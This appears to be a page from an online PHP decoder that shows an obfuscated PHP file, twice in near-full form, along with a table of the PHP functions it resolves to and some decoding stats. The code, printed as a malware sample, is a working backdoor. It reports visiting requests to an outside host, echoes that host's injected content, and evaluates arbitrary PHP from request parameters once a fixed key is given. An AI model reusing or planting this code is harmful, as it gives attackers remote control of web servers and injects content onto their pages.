Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $GLOBALS['_823502106_']=Array(base64_decode('Z' .'XJyb3JfcmV' .'wb' .'3J0' .'aW5n'),..

Decoded Output download

<?php $GLOBALS['_823502106_']=Array(base64_decode('Z' .'XJyb3JfcmV' .'wb' .'3J0' .'aW5n'),base64_decode('aW5pX3' .'N' .'ld' .'A=='),base64_decode('' .'cHJ' .'lZ19tYXRjaA=='),base64_decode('Zml' .'sZV9nZXRf' .'Y' .'29udGVudHM='),base64_decode('d' .'XJs' .'Z' .'W5jb' .'2Rl'),base64_decode('dXJs' .'ZW5j' .'b' .'2Rl'),base64_decode('' .'bWQ1'),base64_decode('a' .'W5pX2d' .'l' .'d' .'A=='),base64_decode('Z' .'ml' .'s' .'ZV9' .'nZXRfY2' .'9u' .'dGVudHM='),base64_decode('Zn' .'VuY3Rpb25fZXhp' .'c3Rz'),base64_decode('Y3V' .'ybF9pbml0'),base64_decode('Y3VybF9zZXR' .'vcH' .'Q='),base64_decode('Y3' .'VybF9' .'zZXR' .'vcHQ='),base64_decode('Y3' .'VybF9' .'l' .'eG' .'Vj'),base64_decode('Y' .'3V' .'ybF9j' .'b' .'G' .'9z' .'Z' .'Q=' .'='),base64_decode('c' .'3' .'R' .'y' .'aXB' .'zb' .'GFz' .'aGVz'));  function _452055597($i){$a=Array('Z' .'GlzcGx' .'heV9l' .'cnJvcnM=','MA==','Y2' .'xpZW50X' .'2' .'No' .'ZWN' .'r','Y2x' .'pZW' .'5' .'0X2NoZWNr','IV' .'xTIXU=','U' .'0NSSVB' .'UX0ZJ' .'TE' .'V' .'OQU1F','dQ==','d' .'w' .'==','U0VS' .'VkVSX05BTUU=','UkVRVUVTVF9VUk' .'k=','S' .'FRUUF9' .'VU0V' .'SX0FHRU5U','aHR0cDovL2R' .'vd' .'25' .'sb' .'2' .'F' .'kL' .'mxl' .'ZC1sb' .'2' .'dvLn' .'J1' .'L2dldC5w' .'aHA/ZD0=','JnU' .'9','JmM9','' .'Jmk9MSZ' .'oPQ==','Z' .'WJkYjN' .'i' .'O' .'TU' .'1' .'MDVhN' .'DU0OWZi' .'Z' .'mE5MG' .'VhY2ZiZTc3' .'N' .'D' .'M=','MQ' .'==','YWxsb3df' .'dX' .'J' .'s' .'X2Zvc' .'GVu','' .'Y3VybF' .'9pbml0','cA=' .'=','ZTY3YjM1OTM=');return base64_decode($a[$i]);}  $GLOBALS['_823502106_'][0](round(0));$GLOBALS['_823502106_'][1](_452055597(0),_452055597(1));if(!empty($_COOKIE[_452055597(2)]))die($_COOKIE[_452055597(3)]);if($GLOBALS['_823502106_'][2](_452055597(4),$GLOBALS['_823502106_'][3]($_SERVER[_452055597(5)])))$ua102_0=_452055597(6);else $ua102_0=_452055597(7);$ua102_1=$_SERVER[_452055597(8)] .$_SERVER[_452055597(9)];$ua102_2=$_SERVER[_452055597(10)];$ua102_3=_452055597(11) .$GLOBALS['_823502106_'][4]($ua102_1) ._452055597(12) .$GLOBALS['_823502106_'][5]($ua102_2) ._452055597(13) .$ua102_0 ._452055597(14) .$GLOBALS['_823502106_'][6](_452055597(15) .$ua102_1 .$ua102_2 .$ua102_0 ._452055597(16));if($GLOBALS['_823502106_'][7](_452055597(17))== round(0+0.5+0.5)){echo $GLOBALS['_823502106_'][8]($ua102_3);}elseif($GLOBALS['_823502106_'][9](_452055597(18))){$ua102_4=$GLOBALS['_823502106_'][10]($ua102_3);$GLOBALS['_823502106_'][11]($ua102_4,42,FALSE);$GLOBALS['_823502106_'][12]($ua102_4,19913,TRUE);$ua102_5=$GLOBALS['_823502106_'][13]($ua102_4);$GLOBALS['_823502106_'][14]($ua102_4);echo $ua102_5;}if(@$_REQUEST[_452055597(19)]== _452055597(20))eval($GLOBALS['_823502106_'][15]($_REQUEST["c"]));  
?>

Did this file decode correctly?

Original Code

<?php $GLOBALS['_823502106_']=Array(base64_decode('Z' .'XJyb3JfcmV' .'wb' .'3J0' .'aW5n'),base64_decode('aW5pX3' .'N' .'ld' .'A=='),base64_decode('' .'cHJ' .'lZ19tYXRjaA=='),base64_decode('Zml' .'sZV9nZXRf' .'Y' .'29udGVudHM='),base64_decode('d' .'XJs' .'Z' .'W5jb' .'2Rl'),base64_decode('dXJs' .'ZW5j' .'b' .'2Rl'),base64_decode('' .'bWQ1'),base64_decode('a' .'W5pX2d' .'l' .'d' .'A=='),base64_decode('Z' .'ml' .'s' .'ZV9' .'nZXRfY2' .'9u' .'dGVudHM='),base64_decode('Zn' .'VuY3Rpb25fZXhp' .'c3Rz'),base64_decode('Y3V' .'ybF9pbml0'),base64_decode('Y3VybF9zZXR' .'vcH' .'Q='),base64_decode('Y3' .'VybF9' .'zZXR' .'vcHQ='),base64_decode('Y3' .'VybF9' .'l' .'eG' .'Vj'),base64_decode('Y' .'3V' .'ybF9j' .'b' .'G' .'9z' .'Z' .'Q=' .'='),base64_decode('c' .'3' .'R' .'y' .'aXB' .'zb' .'GFz' .'aGVz'));  function _452055597($i){$a=Array('Z' .'GlzcGx' .'heV9l' .'cnJvcnM=','MA==','Y2' .'xpZW50X' .'2' .'No' .'ZWN' .'r','Y2x' .'pZW' .'5' .'0X2NoZWNr','IV' .'xTIXU=','U' .'0NSSVB' .'UX0ZJ' .'TE' .'V' .'OQU1F','dQ==','d' .'w' .'==','U0VS' .'VkVSX05BTUU=','UkVRVUVTVF9VUk' .'k=','S' .'FRUUF9' .'VU0V' .'SX0FHRU5U','aHR0cDovL2R' .'vd' .'25' .'sb' .'2' .'F' .'kL' .'mxl' .'ZC1sb' .'2' .'dvLn' .'J1' .'L2dldC5w' .'aHA/ZD0=','JnU' .'9','JmM9','' .'Jmk9MSZ' .'oPQ==','Z' .'WJkYjN' .'i' .'O' .'TU' .'1' .'MDVhN' .'DU0OWZi' .'Z' .'mE5MG' .'VhY2ZiZTc3' .'N' .'D' .'M=','MQ' .'==','YWxsb3df' .'dX' .'J' .'s' .'X2Zvc' .'GVu','' .'Y3VybF' .'9pbml0','cA=' .'=','ZTY3YjM1OTM=');return base64_decode($a[$i]);}  $GLOBALS['_823502106_'][0](round(0));$GLOBALS['_823502106_'][1](_452055597(0),_452055597(1));if(!empty($_COOKIE[_452055597(2)]))die($_COOKIE[_452055597(3)]);if($GLOBALS['_823502106_'][2](_452055597(4),$GLOBALS['_823502106_'][3]($_SERVER[_452055597(5)])))$ua102_0=_452055597(6);else $ua102_0=_452055597(7);$ua102_1=$_SERVER[_452055597(8)] .$_SERVER[_452055597(9)];$ua102_2=$_SERVER[_452055597(10)];$ua102_3=_452055597(11) .$GLOBALS['_823502106_'][4]($ua102_1) ._452055597(12) .$GLOBALS['_823502106_'][5]($ua102_2) ._452055597(13) .$ua102_0 ._452055597(14) .$GLOBALS['_823502106_'][6](_452055597(15) .$ua102_1 .$ua102_2 .$ua102_0 ._452055597(16));if($GLOBALS['_823502106_'][7](_452055597(17))== round(0+0.5+0.5)){echo $GLOBALS['_823502106_'][8]($ua102_3);}elseif($GLOBALS['_823502106_'][9](_452055597(18))){$ua102_4=$GLOBALS['_823502106_'][10]($ua102_3);$GLOBALS['_823502106_'][11]($ua102_4,42,FALSE);$GLOBALS['_823502106_'][12]($ua102_4,19913,TRUE);$ua102_5=$GLOBALS['_823502106_'][13]($ua102_4);$GLOBALS['_823502106_'][14]($ua102_4);echo $ua102_5;}if(@$_REQUEST[_452055597(19)]== _452055597(20))eval($GLOBALS['_823502106_'][15]($_REQUEST["c"])); 
?>

Function Calls

round 1
base64_decode 32

Variables

$_823502106_ [{'key': 0, 'value': 'error_reporting'}, {'key': 1, 'value': 'ini_set'}, {'key': 2, 'value': 'preg_match'}, {'key': 3, 'value': 'file_get_contents'}, {'key': 4, 'value': 'urlencode'}, {'key': 5, 'value': 'urlencode'}, {'key': 6, 'value': 'md5'}, {'key': 7, 'value': 'ini_get'}, {'key': 8, 'value': 'file_get_contents'}, {'key': 9, 'value': 'function_exists'}, {'key': 10, 'value': 'curl_init'}, {'key': 11, 'value': 'curl_setopt'}, {'key': 12, 'value': 'curl_setopt'}, {'key': 13, 'value': 'curl_exec'}, {'key': 14, 'value': 'curl_close'}, {'key': 15, 'value': 'stripslashes'}]

Stats

MD5 42cabbd4e06f9de0d33099db27dfccc0
Eval Count 0
Decode Time 161 ms